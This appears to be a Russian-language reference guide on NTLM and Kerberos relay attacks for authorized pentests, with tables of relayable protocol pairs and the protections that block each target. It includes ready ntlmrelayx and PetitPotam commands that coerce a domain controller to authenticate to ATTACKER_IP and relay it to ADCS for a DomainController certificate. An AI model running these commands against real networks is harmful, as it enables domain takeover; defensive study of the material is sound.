
Технический справочник по множественным техникам ретрансляции
Полное руководство по атакам с ретрансляцией NTLM в рамках авторизованных внутренних пентестов. Охватывает основы аутентификации, методы принуждения, цели ретрансляции по протоколам, инструменты, продвинутое связывание и защитные меры.
Относится к классической ретрансляции NTLM в современных пропатченных средах (после CVE-2019-1040). Для более детального межпротокольного разбора см. Кросс-протокольная ретрансляция.
* Цель не должна требовать подпись SMB † NTLM из источника SMB включает флаги подписи в NEGOTIATE, которые LDAP и ADCS HTTP требуют — из-за чего сессия ретрансляции требует ключ подписи, которого у атакующего нет. Поэтому для ретрансляции на LDAP и ADCS предпочитают аутентификацию из WebDAV/HTTP.
Примитив Cymulate / CVE-2026-20929 (январь 2026) — атакующий отравляет DNS с помощью CNAME, Windows канонизирует SPN, клиент запрашивает TGS для выбранной атакующим цели, AP-REQ ретранслируется. Поскольку многие службы принимают билеты только на основе DNS-части SPN, класс исходного SPN имеет гораздо меньшее значение, чем в ретрансляции NTLM — атака ограничивается тем, применяет ли целевая служба собственный контроль антиретрансляции.
Все строки предполагают, что атакующий имеет сетевую позицию для отравления DNS (DHCPv6 через mitm6, ARP, неблагонадёжный DHCPv4). Полная техника: Ретрансляция Kerberos через злоупотребление CNAME DNS.
# Classic example: coerce DC, relay to ADCS for a DC certificate
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
| Исходная аутентификация | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS |
|---|
| SMB | ✅* | ❌† | ✅ | ✅ | ❌† | ✅ |
| HTTP | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| WebDAV | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| MSSQL | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| Целевая служба | Ретранслируемо, если только... | Патч / статус |
|---|
| SMB | Подпись SMB требуется на цели | — |
| LDAP | Подпись LDAP требуется | — |
| LDAPS | LdapEnforceChannelBinding = 2 (Всегда) | — |
| HTTP / IIS | HTTP CBT применяется (проверка токена HTTP.sys = Require) | CVE-2026-20929 добавляет HTTP.sys CBT |
ADCS /certsrv/ | Расширенная защита = Require на vdir | Применяется HTTP.sys CBT через CVE-2026-20929 |
| MSSQL | Расширенная защита включена | — |
| Exchange (OWA/ECP/…) | EPA на всех виртуальных каталогах | — |